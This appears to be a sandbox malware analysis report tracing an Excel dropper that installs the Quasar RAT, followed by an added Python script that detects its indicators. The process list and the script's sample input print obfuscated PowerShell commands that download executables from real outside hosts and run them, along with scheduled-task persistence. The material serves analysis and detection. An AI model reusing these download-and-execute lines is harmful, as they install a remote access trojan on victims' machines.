Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49179 | 208.95.112.1 | 80 | C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 09:59:14.545986891 CET | 5662 | OUT | GET /json/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: ip-api.com
Connection: Keep-Alive
Jan 6, 2021 09:59:14.600667953 CET | 5663 | IN | HTTP/1.1 200 OK
Date: Wed, 06 Jan 2021 08:59:14 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 281
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
                                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 48 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 72 69 63 68 22 2c 22 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 22 7a 69 70 22 3a 22 38 31 35 32 22 2c 22 6c 61 74 22 3a 34 37 2e 34 33 2c 22 6c 6f 6e 22 3a 38 2e 35 37 31 38 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 43 64 6e 37 37 20 5a 55 52 20 49 54 58 22 2c 22 61 73 22 3a 22 41 53 36 30 30 36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 38 34 2e 31 37 2e 35 32 2e 37 34 22 7d
                                                                          Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZH","regionName":"Zurich","city":"Zurich","zip":"8152","lat":47.43,"lon":8.5718,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"Cdn77 ZUR ITX","as":"AS60068 Datacamp Limited","query":"84.17.52.74"}


                                                                          Session ID:4
                                                                          Source IP:192.168.2.22
                                                                          Source Port:49191
                                                                          Destination IP:195.191.149.103
                                                                          Destination Port:80
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Timestamp:Jan 6, 2021 09:59:52.986964941 CET
                                                                          kBytes transferred:5722
                                                                          Direction:OUT
                                                                          Data:GET /opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                          Host: gtp.bg
                                                                          Connection: Keep-Alive
                                                                          Timestamp:Jan 6, 2021 09:59:53.060939074 CET
                                                                          kBytes transferred:5726
                                                                          Direction:IN
                                                                          Data:HTTP/1.1 200 OK
                                                                          Date: Wed, 06 Jan 2021 08:59:54 GMT
                                                                          Server: Apache
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, Keep-Alive
                                                                          Last-Modified: Tue, 05 Jan 2021 13:10:58 GMT
                                                                          ETag: "53b28b5-db800-5b826effab56e"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 899072
                                                                          Keep-Alive: timeout=3, max=100
                                                                          Content-Type: application/x-msdownload


                                                                          HTTPS Packets

                                                                          Timestamp:Jan 6, 2021 09:57:47.900882959 CET
                                                                          Source IP:172.67.8.238
                                                                          Source Port:443
                                                                          Dest IP:192.168.2.22
                                                                          Dest Port:49167
                                                                          Subject (leaf certificate):CN=www.cutt.ly
                                                                          Issuer (leaf certificate):CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                          Not Before (leaf certificate):Sat Feb 08 01:00:00 CET 2020
                                                                          Not After (leaf certificate):Thu Apr 08 14:00:00 CEST 2021
                                                                          Subject (intermediate CA certificate):CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                          Issuer (intermediate CA certificate):CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                          Not Before (intermediate CA certificate):Thu Nov 02 13:24:33 CET 2017
                                                                          Not After (intermediate CA certificate):Tue Nov 02 13:24:33 CET 2027
                                                                          JA3 SSL Client Fingerprint:769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0
                                                                          JA3 SSL Client Digest:05af1f5ca1b87cc9cc9b25185115607d

                                                                          Code Manipulations

                                                                          Statistics

                                                                          Behavior


                                                                          System Behavior

                                                                          General

                                                                          Start time:09:57:39
                                                                          Start date:06/01/2021
                                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          Wow64 process (32bit):false
                                                                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                          Imagebase:0x13fdd0000
                                                                          File size:27641504 bytes
                                                                          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:57:42
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
                                                                          Imagebase:0x4a150000
                                                                          File size:345088 bytes
                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:09:57:42
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
                                                                          Imagebase:0x4a150000
                                                                          File size:345088 bytes
                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:09:57:42
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
                                                                          Imagebase:0x4a150000
                                                                          File size:345088 bytes
                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:09:57:42
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
                                                                          Imagebase:0x13f990000
                                                                          File size:473600 bytes
                                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:57:42
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
                                                                          Imagebase:0x4a150000
                                                                          File size:345088 bytes
                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:09:57:43
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
                                                                          Imagebase:0x13f990000
                                                                          File size:473600 bytes
                                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:57:43
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
                                                                          Imagebase:0x4a150000
                                                                          File size:345088 bytes
                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:09:57:43
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
                                                                          Imagebase:0x13f990000
                                                                          File size:473600 bytes
                                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:57:44
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
                                                                          Imagebase:0x13f990000
                                                                          File size:473600 bytes
                                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:57:44
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
                                                                          Imagebase:0x13f990000
                                                                          File size:473600 bytes
                                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000011.00000002.2113764449.000000000384C000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:57:47
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\attrib.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:'C:\Windows\system32\attrib.exe' +s +h pd.bat
                                                                          Imagebase:0xffd90000
                                                                          File size:18432 bytes
                                                                          MD5 hash:C65C20C89A255517F11DD18B056CADB5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:09:57:53
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
                                                                          Imagebase:0x4a150000
                                                                          File size:345088 bytes
                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:09:57:53
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\mode.com
                                                                          Wow64 process (32bit):false
                                                                          Commandline:mode 18,1
                                                                          Imagebase:0xff640000
                                                                          File size:30208 bytes
                                                                          MD5 hash:718E86CB060170430D4EF70EE39F93D4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:09:57:54
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\cmd.exe /c ver
                                                                          Imagebase:0x4a150000
                                                                          File size:345088 bytes
                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:09:57:54
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;'
                                                                          Imagebase:0x4a150000
                                                                          File size:345088 bytes
                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
Programmed in: C, C++ or other language

General

Start time: 09:57:54
Start date: 06/01/2021
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
Imagebase: 0x13f990000
File size: 473600 bytes
MD5 hash: 852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

General

Start time: 09:58:01
Start date: 06/01/2021
Path: C:\Users\user\AppData\Roaming\sp.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Roaming\sp.exe'
Imagebase: 0xbb0000
File size: 4384256 bytes
MD5 hash: E79F542FB3F5AA6E4400953BE24780DB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000018.00000002.2214696760.0000000002B4B000.00000004.00000001.sdmp, Author: Joe Security

General

Start time: 09:58:35
Start date: 06/01/2021
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp'
Imagebase: 0xfe0000
File size: 179712 bytes
MD5 hash: 2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 09:58:36
Start date: 06/01/2021
Path: C:\Users\user\AppData\Roaming\sp.exe
Wow64 process (32bit): false
Commandline: {path}
Imagebase: 0xbb0000
File size: 4384256 bytes
MD5 hash: E79F542FB3F5AA6E4400953BE24780DB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 09:58:37
Start date: 06/01/2021
Path: C:\Users\user\AppData\Roaming\sp.exe
Wow64 process (32bit): true
Commandline: {path}
Imagebase: 0xbb0000
File size: 4384256 bytes
MD5 hash: E79F542FB3F5AA6E4400953BE24780DB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 09:59:03
Start date: 06/01/2021
Path: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe'
Imagebase: 0xb0000
File size: 899072 bytes
MD5 hash: CEC5782C931581F13CE3C5D5B6A948A2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000001F.00000002.2281214797.0000000002131000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 19%, Metadefender
• Detection: 30%, ReversingLabs

General

Start time: 09:59:08
Start date: 06/01/2021
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmp4F59.tmp'
Imagebase: 0x3d0000
File size: 179712 bytes
MD5 hash: 2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 09:59:09
Start date: 06/01/2021
Path: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe
Wow64 process (32bit): false
Commandline: {path}
Imagebase: 0xb0000
File size: 899072 bytes
MD5 hash: CEC5782C931581F13CE3C5D5B6A948A2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 09:59:09
Start date: 06/01/2021
Path: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe
Wow64 process (32bit): true
Commandline: {path}
Imagebase: 0xb0000
File size: 899072 bytes
MD5 hash: CEC5782C931581F13CE3C5D5B6A948A2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

General

Start time: 09:59:52
Start date: 06/01/2021
Path: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe'
Imagebase: 0x230000
File size: 899072 bytes
MD5 hash: CEC5782C931581F13CE3C5D5B6A948A2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000025.00000002.2383386591.0000000002191000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 19%, Metadefender
• Detection: 30%, ReversingLabs

General

Start time: 09:59:56
Start date: 06/01/2021
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpC70.tmp'
Imagebase: 0x120000
File size: 179712 bytes
MD5 hash: 2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

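Read top to bottom, the process list above is the whole infection chain: a hidden-window PowerShell download cradle whose cmdlet names are split with backticks, the dropped sp.exe launched from %APPDATA%, and schtasks.exe registering a task under a folder named Updates from an XML file in %TEMP% for the Quasar payload. One caveat when matching on these: the schtasks command line names C:\Windows\System32 while the recorded path is C:\Windows\SysWOW64, because the 32-bit parent is subject to WoW64 file system redirection, so a detection keyed on the image path alone should accept both. The script below is an added example written for this page; it is not part of the Joe Sandbox report or of any vendor tool. It normalises the PowerShell obfuscation and flags those indicators in raw command lines. Its input is a constructed list holding the three command lines copied from the entries above; the rule names and the set of "user-writable" directories are my own choices.

```python
import re

# Constructed input: command lines copied from the process list in this report.
SAMPLE_CMDLINES = [
    r"powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;",
    r"'C:\Users\user\AppData\Roaming\sp.exe'",
    r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp'",
]

# Directories an unprivileged user can write to and a dropper typically uses
# (assumption: this list is ours, extend it for your estate).
USER_WRITABLE = re.compile(r"\\appdata\\(roaming|local\\temp)\\", re.IGNORECASE)


def normalize_powershell(cmd: str) -> str:
    """Undo the cheap obfuscation seen in the cradle above.

    PowerShell treats a backtick before an ordinary letter as a no-op, so
    nEw-oBje`cT is New-Object; cmdlet and method names are case-insensitive;
    and ('DownloadFile').Invoke(...) is merely a reflective spelling of
    .DownloadFile(...). Normalising first lets one rule catch every variant.
    """
    s = cmd.replace("`", "")
    s = re.sub(r"\.\('(\w+)'\)\.Invoke\(", r".\1(", s)
    return s.lower()


def analyze_cmdline(cmd: str) -> list:
    """Return human-readable findings for a single process command line."""
    findings = []
    tokens = cmd.strip().strip("'\"").split()
    if not tokens:
        return findings
    image = tokens[0].lower()

    # Generic: the process image itself lives in a user-writable profile dir.
    if USER_WRITABLE.search(image):
        findings.append(f"image runs from user-writable profile path: {image}")

    if "powershell" in image:
        ps = normalize_powershell(cmd)
        if "`" in cmd:
            findings.append("powershell: backtick-split tokens (obfuscation)")
        # -w 1 is -WindowStyle Hidden (ProcessWindowStyle.Hidden == 1).
        if re.search(r"(^|\s)-w(indowstyle)?\s+(1|hidden)\b", ps):
            findings.append("powershell: hidden window (-w 1)")
        if "new-object net.webclient" in ps and ".downloadfile(" in ps:
            findings.append("powershell: WebClient download cradle")
        if re.search(r"start-process\s+\$env:appdata", ps):
            findings.append("powershell: executes dropped file from %APPDATA%")
        url = re.search(r"https?://[^'\s,)]+", cmd)
        if url:
            findings.append(f"powershell: fetches {url.group(0)}")

    # schtasks /Create fed from an XML definition staged in %TEMP%: the task
    # body never appears on the command line, so the XML path is the signal.
    if "schtasks" in image and "/create" in cmd.lower():
        tn = re.search(r"/tn\s+'?([^'\s]+)'?", cmd, re.IGNORECASE)
        xml = re.search(r"/xml\s+'?([^']+)'?", cmd, re.IGNORECASE)
        if xml and USER_WRITABLE.search(xml.group(1)):
            findings.append(f"schtasks: task created from XML in %TEMP%: {xml.group(1)}")
        if tn:
            findings.append(f"schtasks: task name {tn.group(1)}")

    return findings


def triage(cmdlines) -> dict:
    """Map each command line that produced findings to those findings."""
    out = {}
    for c in cmdlines:
        hits = analyze_cmdline(c)
        if hits:
            out[c] = hits
    return out


if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_CMDLINES).items():
        print(cmd[:70] + ("..." if len(cmd) > 70 else ""))
        for h in hits:
            print("   -", h)
```

Feed it the Commandline fields of a process tree (Sysmon event 1 or the sandbox export) rather than individual strings; the normalisation step is what makes the rules survive the next re-casing of the cradle, while the schtasks rule depends only on the XML path and the hidden task name and needs no decoding at all.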
                                                                          Disassembly

                                                                          Code Analysis
